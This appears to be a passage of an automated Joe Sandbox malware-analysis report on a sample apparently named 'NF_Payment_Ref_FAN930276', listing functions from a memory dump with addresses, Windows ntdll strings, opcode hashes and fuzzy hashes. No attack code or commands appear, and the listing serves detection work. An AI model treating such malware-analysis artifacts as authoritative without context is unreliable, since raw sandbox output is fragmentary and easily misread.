\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B7C1C5
PreferredUILanguages, xrefs: 01B7C212

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: eea8c353a9247ea833b84ef08dee202f46c81aeaddb4b6883e8ad2f1f52ab99a
Instruction ID: f87bc2ce437a380934394ea5b43c2e44e621c93a4e93db9fc50686fe6c8a2135
Opcode Fuzzy Hash: eea8c353a9247ea833b84ef08dee202f46c81aeaddb4b6883e8ad2f1f52ab99a
Instruction Fuzzy Hash: E2414171E0020AEBDF15DED8C995BEEBBB8EB14704F1441AEE619F7280E7749A448B50

Function 01B54144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 01B54172
LdrpResValidateFilePath Enter, xrefs: 01B54160
@, xrefs: 01B54225

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: fb62abd7a101ee82e41797f8ef4d9652fbf69005295e9efc260aae3527cfca24
Instruction ID: 8ea04d4521a842d2a14489ae6bd0253e58037dbbad9194a21541c18bc17a39a7
Opcode Fuzzy Hash: fb62abd7a101ee82e41797f8ef4d9652fbf69005295e9efc260aae3527cfca24
Instruction Fuzzy Hash: 8C412772A006588BEF6ADBDAC944BADBBB4FF55380F140499DD01EB781E7358981CB11

Function 01B44755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B44888
minkernel\ntdll\ldrredirect.c, xrefs: 01B44899
LdrpCheckRedirection, xrefs: 01B4488F

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: e4e8022c66444c528d5e5cc79d520532e1bbd62092c8d95973139df39d7dc750
Instruction ID: d5e0a6b1316522e9a52cf6649a50fdfc91ea703c8d12a2dab7eae1bf0d47bbdc
Opcode Fuzzy Hash: e4e8022c66444c528d5e5cc79d520532e1bbd62092c8d95973139df39d7dc750
Instruction Fuzzy Hash: D041D132A006619BEB29CE69D840B267BE4FF49650B0586D9ED4897212E330D821EB91

Function 01AD0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01B25431
HEAP: , xrefs: 01B2543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01B25449

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 43b6a9cd6a9ac494d1cd68100be91692f807ba335ef606de3433d8e428bf2e98
Instruction ID: 59994896a28c290bc5736ebb62b66b192c0e343684f330fa5075d3dbfe1249ae
Opcode Fuzzy Hash: 43b6a9cd6a9ac494d1cd68100be91692f807ba335ef606de3433d8e428bf2e98
Instruction Fuzzy Hash: FA1133303185529FEB2DDB29C985FBAF7A8EF40A25F188199F41BCB256DB30D844C760

Function 01B420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01B42104
LdrpInitializationFailure, xrefs: 01B420FA
Process initialization failed with status 0x%08lx, xrefs: 01B420F3

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 46b97219213df8f7b56c31acb8616d18b09cb879e4b7ab1e1b39cfd1c629132a
Instruction ID: c1e6446e4b9eeb9ed87febebea21d601a26da4d21044fe38e73a2db18b987b40
Opcode Fuzzy Hash: 46b97219213df8f7b56c31acb8616d18b09cb879e4b7ab1e1b39cfd1c629132a
Instruction Fuzzy Hash: 56F0F635640308BBEB28EA4EDC43FA93BA8FB44B54F5440D9FB00B7681D3F0A950DA91

Function 01AD03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B24D8A

Strings

#%u, xrefs: 01B24D82

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 7e03d612da2fe1e217535a9baf690991e71c77bb2722a829b0c85985f63a035c
Instruction ID: ff90410244ae639b386462647a2c9ff47c0f952de96a13b2dde6ec484737ada1
Opcode Fuzzy Hash: 7e03d612da2fe1e217535a9baf690991e71c77bb2722a829b0c85985f63a035c
Instruction Fuzzy Hash: 0A7159B1A0050A9FDB05DFA8C980FAEBBF8FF18304F1440A5E905A7251EB74ED05CBA1

Function 01ACA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 01ACAA25
LdrResSearchResource Enter, xrefs: 01ACAA13

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 41ce9b6665163c7d6eca47dc5a1a9fc8b75a96f74e5d65fd64b7546c998dbdeb
Instruction ID: 01b029390d223e6bc6506380fa61725bb8e649b81dd65ddfd118a16da7eee51a
Opcode Fuzzy Hash: 41ce9b6665163c7d6eca47dc5a1a9fc8b75a96f74e5d65fd64b7546c998dbdeb
Instruction Fuzzy Hash: 70E19171E002199BEF26DF9DC980BBEBBB9FF08710F1445AAE905E7251E7389944CB50

Function 01B8A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01B8A551
`, xrefs: 01B8A44B

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: d7cde51c1488c69299cb59f9cf450c4247a8257a4307568154e16c534a21f954
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 17C1D3312043429BEB29EF28C841B6BBBE5EFC4B18F084A6EF69687290D774D545CB51

Function 01B3E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 01B3E75A
UEFI, xrefs: 01B3E751

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 2f9cc6b3400b2639f2920b8c2e2a2f01affc16ee5a5c98f24a532e2c24f40e56
Instruction ID: c6ebe0c253c5ce8f6df3190846cff41a5bf8e45be170d6ea2e097e44244827f2
Opcode Fuzzy Hash: 2f9cc6b3400b2639f2920b8c2e2a2f01affc16ee5a5c98f24a532e2c24f40e56
Instruction Fuzzy Hash: C9616F71E007199FDB19DFA8C940BAEBBB5FB84700F1441AEE649EB291D731E910CB50

Function 01B643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01B64525
@, xrefs: 01B64437

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: d56dc862b25a7fd835eff7789d406578a573a8cd8b5820438b75da37f59c382f
Instruction ID: ae3c0b0def56e894d35a6331c52697f8b99d93a1c3c8a48604ddb9b8182b4c93
Opcode Fuzzy Hash: d56dc862b25a7fd835eff7789d406578a573a8cd8b5820438b75da37f59c382f
Instruction Fuzzy Hash: 4D5147B1E0061DAEDF15DFA9CD84AEEBBBCEB14754F100169E601A7290D7349E05CBA0

Function 01AC04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01AC063D
kLsE, xrefs: 01AC0540

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 0aed5037cc030b5b8bf7c56ccc61d654e1bed92d8bb62ef90838d514d863dbfc
Instruction ID: d29e368f5182eb5c23412a5de47799b3615f28b0e5bd4d1e664d222dd4707cd1
Opcode Fuzzy Hash: 0aed5037cc030b5b8bf7c56ccc61d654e1bed92d8bb62ef90838d514d863dbfc
Instruction Fuzzy Hash: AD51BE79500746DFDB24EF38C6846A3BBE4AF84B04F10883EF69A87241E7B09545CF92

Function 01ACA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 01ACA309
RtlpResUltimateFallbackInfo Enter, xrefs: 01ACA2FB

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: b2c1378e958c7a0997be0e3b2dba3c1bbcf47e888cd65e289adeb4e0ccd63cb0
Instruction ID: 089a5fea0f919ab9cad65ef92c6ad1f9caadc424745834183fa369e7245b62b6
Opcode Fuzzy Hash: b2c1378e958c7a0997be0e3b2dba3c1bbcf47e888cd65e289adeb4e0ccd63cb0
Instruction Fuzzy Hash: 9F41DE79A00659DBDB25CF69C854B7A7BB4FF84B00F1880A9E909DB391E3B5D940CB50

Function 01AFA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 01AFA5E4
Threadpool!, xrefs: 01AFA5E9

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 3ddad3936b6ec3b4c0cd6bb275ee850ff32d943f59131aaad4a6409659d1d1f4
Instruction ID: 93727658da45eebc64f312752c8ba78aa90f6f263407c911e8d7b0c486e898f0
Opcode Fuzzy Hash: 3ddad3936b6ec3b4c0cd6bb275ee850ff32d943f59131aaad4a6409659d1d1f4
Instruction Fuzzy Hash: 7B01D1B2650700AFE362DF64CD46B5677E8E784715F04897DB64CC7590E374D804CB46

Function 01ACC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 01ACC8C3, 01ACCA40

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 575ac3d8eeb072757d521978ce471dc6b1db76bb2a3f849d83949d588e0abf5c
Instruction ID: fd8fb5debc53c076c488350408df3450847599bceec5c41c4505c91a708101ab
Opcode Fuzzy Hash: 575ac3d8eeb072757d521978ce471dc6b1db76bb2a3f849d83949d588e0abf5c
Instruction Fuzzy Hash: E5825A75E002199FEB25CFADC980BEDBBB1BF48B20F14816DD919AB355D7309981CB90

Function 01B46420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01B465C1

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 77951f04850fd49bbf5843e652488b2186d5d1b1d930cae94393fccf3dd5db05
Instruction ID: b566b4de195314521937629aafcea29ece7c9f5027958b5e40b1b57872062fd4
Opcode Fuzzy Hash: 77951f04850fd49bbf5843e652488b2186d5d1b1d930cae94393fccf3dd5db05
Instruction Fuzzy Hash: F7918FB1A40219AFEB25DF94CD85FAEBBB8EF19750F104065F600AB190D774AD04DBA0

Function 01B6E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 01B6E1FA

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0d1bc710e45664591feaf5a42aa51d303a16bf5cf368f0a1745a9e97e79a710d
Instruction ID: 66478ae0ca6b19a8da4d84071ff9f2a9ea2a758218a2649ab02fbfac59b14471
Opcode Fuzzy Hash: 0d1bc710e45664591feaf5a42aa51d303a16bf5cf368f0a1745a9e97e79a710d
Instruction Fuzzy Hash: 9891BE76900609AEDF2AEBA5DD84FAFBB7EEF65740F000069F601A7250DB38D905CB50

Function 01AFA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 01B367C9

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 20c9a4958bf023a630e75184d2c6ed0217655965c35e552e833fbe80ffe71a69
Instruction ID: 9abaf4232a19f20deb89e89f71db761757856716693d8c000d6a5220fdef2589
Opcode Fuzzy Hash: 20c9a4958bf023a630e75184d2c6ed0217655965c35e552e833fbe80ffe71a69
Instruction Fuzzy Hash: 63716BB5E0020AEFDF29CF98D5906EDBBB1FF98700F1481AEE905A7240E7759A51CB50

Function 01B64978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01B64A7F

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: f61b4e581b9b162a4d05281799ec0e5577bcc25b77120c463b32a66204a558a8
Instruction ID: 3db61aeb307649ac7f4b98da3219bfa8d2ba6d72aedc9dec7c9d06100b30fe49
Opcode Fuzzy Hash: f61b4e581b9b162a4d05281799ec0e5577bcc25b77120c463b32a66204a558a8
Instruction Fuzzy Hash: D051CA72D0062AAFDF19DF99D940AAEBBB8FF25B04F054169EA11B7240D7384C01CBE4

Function 01ADE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 01ADE6A4

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 6ed2ee063ce362f341266e2ceaa382a061d1fbdc8e01084d723aeccbd8db9ef8
Instruction ID: dd86719a3a9388e29e2b7495cc21507b76b053df06d13350098f80bd91501ca4
Opcode Fuzzy Hash: 6ed2ee063ce362f341266e2ceaa382a061d1fbdc8e01084d723aeccbd8db9ef8
Instruction Fuzzy Hash: EF41E572608742ABD711DB75C980B6BBBE8EF88B14F45092DF686DB180EB74D904C793

Function 01B3C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 01B3C77F

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: ab91000824a52fd364bd8b1b49c60cfa960319503cf883b2d7c5b83675261577
Instruction ID: 90abab22ce43f5597cc07065db03647c8120bb7d21aa529483d798c1a2b255c9
Opcode Fuzzy Hash: ab91000824a52fd364bd8b1b49c60cfa960319503cf883b2d7c5b83675261577
Instruction Fuzzy Hash: 934124B1D0052DAADF25DA94DC84FEEBB7CAB44714F0045E6EB08B7140DB709E598FA4

Function 01B56B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01B56B91

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: a17b8eed6f7050df7623aa78b1b387fb18e93548aace8ab692934942389a83ab
Instruction ID: 62cedc0900115e25cf9fb78195ce4302478ad2745aa8ea0a95b0fcf53e82e232
Opcode Fuzzy Hash: a17b8eed6f7050df7623aa78b1b387fb18e93548aace8ab692934942389a83ab
Instruction Fuzzy Hash: E5312831A007099BEB3ADB69C850BAE7BB8DF54704F9440A8EE41AB282D775D805CB50

Function 01B3CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 01B3CAA2

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 059bee690cba1a9f9c41e45ec65d5bd87b3b5e85d7bf75bdd40350f684fc9dd1
Instruction ID: a0eec1e1d0360f5bdc1ca2070104931c9045fe3b3c36d50b2b39614fb9ea1811
Opcode Fuzzy Hash: 059bee690cba1a9f9c41e45ec65d5bd87b3b5e85d7bf75bdd40350f684fc9dd1
Instruction Fuzzy Hash: 8731F176900519AFEF1EDA99C845E6BBF74EB80720F0141AAA901F7290E7309E15DBE0

Function 01B4892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B4895E

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 58d37f3f0c0dbc09e5d2615671be203b35608f91132c71c492e23393f87f1c7f
Instruction ID: ca530fdb672ba7a41f907c5616b66285aef73a34e4dccf00b41165f016faa8d6
Opcode Fuzzy Hash: 58d37f3f0c0dbc09e5d2615671be203b35608f91132c71c492e23393f87f1c7f
Instruction Fuzzy Hash: F6017B36200A01AFEA3D6F9ADCC4A667F65EF85654B08609CF74103911CB606840E793

Function 01B62000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 601330a307017423ccc508861203decd511ad95f74d95ef32e2a9e0452565310
Instruction ID: 1e8c5823adcf74a4495262695ad152696e9b22b2d29a72d9853408cb964f45e2
Opcode Fuzzy Hash: 601330a307017423ccc508861203decd511ad95f74d95ef32e2a9e0452565310
Instruction Fuzzy Hash: 8842D8716083418FF729CF69C890A6BBBE9FFA4300F0449ADFA8297250D779D945CB52

Function 01B58158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ab8b5216de181284587989d791fe410afbad2de9ca0729bef2aaf42b78e007
Instruction ID: c5c2df43874ce4b0a75208188f2df9b321abfe1c781a4a17fba8d131fd87a391
Opcode Fuzzy Hash: 59ab8b5216de181284587989d791fe410afbad2de9ca0729bef2aaf42b78e007
Instruction Fuzzy Hash: 33423C75A002199FEB69CF69C881BADBBF5FF48300F1481D9E949EB242D7349985CF60

Function 01AD2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca51a36937c3634c2821afc31e864a796116f4ffb3e4811fe53be6c7565b3ce9
Instruction ID: cbeb99f1fe961c2d9b88543d50aea5d9dfaf9657d369073b030fe218f6d1a52d
Opcode Fuzzy Hash: ca51a36937c3634c2821afc31e864a796116f4ffb3e4811fe53be6c7565b3ce9
Instruction Fuzzy Hash: 4A321570A007658FDB29CF69C8447BEBBF2FF84704F14419ED89A9B684D775A809CB50

Function 01B6A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d01f9f1e92d80bee9fc87f51d55a6ddecb7fa441681851f41d414683ef31f5
Instruction ID: 888b0971bbfedee40cab0f768c60496283db9d8e2c7b34f44c5abeffc85e9b41
Opcode Fuzzy Hash: d6d01f9f1e92d80bee9fc87f51d55a6ddecb7fa441681851f41d414683ef31f5
Instruction Fuzzy Hash: 6D22AF702046518BEF29CF3DC490372BBE9EF65300F0885D9E996AB286D77DE851DB60

Function 01AE4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: bf633062fb9947552a8e1f98bf13bdd7aec3abbe6d36d090913ee62cee39f3be
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 6DF16E71E0021A9BDF19CFA9D594BAEBBF9EF48710F088169E905EB340E774D845CB60

Function 01B5892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0b9e77cb27bd6ed87de4607b3521a7217d6b3f88a56be8718e9393ae6a7d68
Instruction ID: a9a6f176b26dc0525e653892c281444ef55d39e1394b58abbcc8fdde1333b69a
Opcode Fuzzy Hash: 3b0b9e77cb27bd6ed87de4607b3521a7217d6b3f88a56be8718e9393ae6a7d68
Instruction Fuzzy Hash: 59D1F271E0060A8BDF49CF5AC841BBEB7F5EF88304F1881A9D955E7281D735E9058B60

Function 01AC65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d19220827741cfffa060fdb09a492e382cfaf7311acb1e469f40481959cb40e0
Instruction ID: 0601e3a354343b2d0cfcb1cb7e7e944ee1417907e634cb35b78da539a98c336e
Opcode Fuzzy Hash: d19220827741cfffa060fdb09a492e382cfaf7311acb1e469f40481959cb40e0
Instruction Fuzzy Hash: 71E19F71608342CFC715CF28C590A6ABBF0FF89714F158A6DE9998B351EB31E905CB92

Function 01AB8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec3286137ad370b0590da8eee6a616c5917ea3af558a9d9284ca44213b2fac9
Instruction ID: 5edc369973ccf078ab5f1d2701b49287afe7aa6be38f2ffe9507e83607b31f1d
Opcode Fuzzy Hash: 9ec3286137ad370b0590da8eee6a616c5917ea3af558a9d9284ca44213b2fac9
Instruction Fuzzy Hash: 9BD1E071A002469BCB19DF68C9D0AFAB7BDFF54208F09466DF912DB286E738D950CB50

Function 01B48243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: b3d5251ce3ed96f08e5f064fe9e7642228a70f2f08c6f76b6579e733f30e249c
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
